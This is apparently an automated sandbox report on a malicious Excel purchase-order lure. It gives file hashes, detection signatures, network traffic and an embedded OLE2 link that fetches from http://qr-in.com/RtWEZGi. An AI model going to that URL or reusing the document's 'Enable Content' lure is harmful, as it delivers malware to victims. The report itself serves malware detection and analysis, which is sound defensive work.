Windows Analysis Report
PO 4500025813.xls

Overview

General Information

Sample name:	PO 4500025813.xls
Analysis ID:	1446720
MD5:	1a1256f2cb9b79e436d93cb4ef7965e9
SHA1:	d759cc8c94f83d931d339bf576c2d2a6d2edc111
SHA256:	547e6df90153f3d2b2c8ae05399fef0b98431f2ec3d5628cb570acf0f0af393e
Tags:	xls
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Excel sheet contains many unusual embedded objects

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

IP address seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: PO 4500025813.xls

ReversingLabs: Detection: 15%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: qr-in.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /RtWEZGi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RtWEZGi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-AliveCookie: PHPSESSID=2fpj5qe86di95ocg0rn295j24v

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FBE9C81C.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /RtWEZGi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RtWEZGi HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-AliveCookie: PHPSESSID=2fpj5qe86di95ocg0rn295j24v

Source: global traffic

DNS traffic detected: DNS query: qr-in.com

Source: PO 4500025813.xls, 5D330000.0.dr	String found in binary or memory: http://qr-in.com/RtWEZGi
Source: PO 4500025813.xls, 5D330000.0.dr, A04C86FF.emf.0.dr, 7B56516D.png.0.dr, ~DF8B0F277084679A1A.TMP.0.dr, ~DF6E18AAE11A49FA57.TMP.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 12

Screenshot OCR: Enable Content from the yellow bar above 19 12 ' " Vol :1ren KOyU, Canakk 20 13 " Akc ay Cad. No

Excel sheet contains many unusual embedded objects

Source: PO 4500025813.xls	OLE: Microsoft Excel 2007+
Source: ~DF8B0F277084679A1A.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 5D330000.0.dr	OLE: Microsoft Excel 2007+

Document embeds suspicious OLE2 link

Source: PO 4500025813.xls	Stream path 'MBD00088CAD/\x1Ole' : http://qr-in.com/RtWEZGi*>OFl=Iz%BLN3\}_Cxoja1[{d+D/hBrhSw;(a/6l:k")Yn{8OspjCi,XNd&Q6S-=`.+-:b/bvHxVr:ftn3Wz>vsT\|M"OECcY3ad2UKC34mOfXGjIQl5QXdRsCwN4zSPsZsqL48KjLOlkfCVLXwtId00gxEI7RyYeyRGopk96g6U45ALPHzFLbtg6F3wyMkWjn5Ld1WyCViIwQZOf3mbQrozuqVevIfNkQkXyJ2XX1mEjmycs2qY7La5PRfxMwrng5oaDgCJ7JbIpj5TMcguLG8mQdAZjYt561eNcgAVXQKpj8AGtqQWwEraEtaERrWM5JHrS3StvKs\|K\|\j]"Jik$.uw
Source: 5D330000.0.dr	Stream path 'MBD00088CAD/\x1Ole' : http://qr-in.com/RtWEZGi*>OFl=Iz%BLN3\}_Cxoja1[{d+D/hBrhSw;(a/6l:k")Yn{8OspjCi,XNd&Q6S-=`.+-:b/bvHxVr:ftn3Wz>vsT\|M"OECcY3ad2UKC34mOfXGjIQl5QXdRsCwN4zSPsZsqL48KjLOlkfCVLXwtId00gxEI7RyYeyRGopk96g6U45ALPHzFLbtg6F3wyMkWjn5Ld1WyCViIwQZOf3mbQrozuqVevIfNkQkXyJ2XX1mEjmycs2qY7La5PRfxMwrng5oaDgCJ7JbIpj5TMcguLG8mQdAZjYt561eNcgAVXQKpj8AGtqQWwEraEtaERrWM5JHrS3StvKs\|K\|\j]"Jik$.uw

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DF8B0F277084679A1A.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal60.winXLS@1/10@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\5D330000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7FB9.tmp

Jump to behavior

Source: PO 4500025813.xls	OLE indicator, Workbook stream: true
Source: 5D330000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: PO 4500025813.xls

ReversingLabs: Detection: 15%

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: PO 4500025813.xls

Initial sample: OLE indicators vbamacros = False

Source: PO 4500025813.xls

Initial sample: OLE indicators encrypted = True

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: PO 4500025813.xls	Stream path 'MBD00088CAC/Package' entropy: 7.95103243582 (max. 8.0)
Source: PO 4500025813.xls	Stream path 'Workbook' entropy: 7.98985924559 (max. 8.0)
Source: ~DF8B0F277084679A1A.TMP.0.dr	Stream path 'Package' entropy: 7.94201653752 (max. 8.0)
Source: 5D330000.0.dr	Stream path 'MBD00088CAC/Package' entropy: 7.94201653752 (max. 8.0)
Source: 5D330000.0.dr	Stream path 'Workbook' entropy: 7.99709423089 (max. 8.0)

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	qr-in.com	European Union		13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
qr-in.com	188.114.97.3	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://qr-in.com/RtWEZGi	false	Avira URL Cloud: safe	unknown

ID:	1446720
Product:	CloudBasic
Start time:	20:26:04
Start date:	23.05.2024
Sample:	PO 4500025813.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	1a1256f2cb9b79e436d93cb4ef7965e9
SHA1:	d759cc8c94f83d931d339bf576c2d2a6d2edc111
SHA256:	547e6df90153f3d2b2c8ae05399fef0b98431f2ec3d5628cb570acf0f0af393e
Filetype:	Microsoft Excel sheet (30009/1) 78.94%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B56516D.png	PNG image data, 1008 x 529, 8-bit/color RGBA, non-interlaced	460EFCF478D05AFB04311BA4833B41FB	35A00E81ED5AA915810702E9BA42E0D6E9E24BA1	ABBF9B20F57F85EDAD5D5B5848335775428B47D1A48C0772A72D7A6C136D9C51
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A04C86FF.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	B75BEAB062262E9FE0F994171FB4506C	DA7D4C80217F413EC1A59D937D930946639A5225	96044A2032199CD5CB4C0567BC8F420500F38618FC26595D9F8EED6F3FCF0161
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FBE9C81C.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	20AF225366CE6EDF8BE97371C90A7FA7	319E417FDB0D321E91B4A3904C49DEE6CBFEBF80	0B2B9FBE0F1111FCEE4398B1AB3FE8788F3D0CBB9EB702B6EA729E0FEBD523E0
C:\Users\user\AppData\Local\Temp\~DF5E208046F04CF4C0.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF6E18AAE11A49FA57.TMP	data	B741E0D2B08DBCA497067F31E87F61CF	615390C30CD5933F88DF404C2F628383E8EBAA7C	1DB16C01E06E002D1C41038831D08ECC54EB5D67E04DFAADF69918619F0F5C0A
C:\Users\user\AppData\Local\Temp\~DF8B0F277084679A1A.TMP	Composite Document File V2 Document, Cannot read section info	9EF3E118E202EAE2397D01818A9D7363	A57823714FFFA371ADB39E3BCFB13D29698D9908	8F5DB1DB693B3E53BDC69693355C790610011AF2687B496A7BA89F3F0840F6A8
C:\Users\user\AppData\Local\Temp\~DFBF63F4E6D7BA905E.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\5D330000	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 19:27:49 2024, Security: 1	AF75807FB9AF48D758760DA197D4B392	DF0D4FC123D89B4BC2A96108C6472B09A33630D7	A1EB442E99CBB8DD50EECFFA09B1DC84ED18F6BE24DCC37251D82EE8113CA004
C:\Users\user\Desktop\5D330000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\PO 4500025813.xls (copy)	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 19:27:49 2024, Security: 1	AF75807FB9AF48D758760DA197D4B392	DF0D4FC123D89B4BC2A96108C6472B09A33630D7	A1EB442E99CBB8DD50EECFFA09B1DC84ED18F6BE24DCC37251D82EE8113CA004

Windows Analysis Report
PO 4500025813.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report PO 4500025813.xls

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PO 4500025813.xls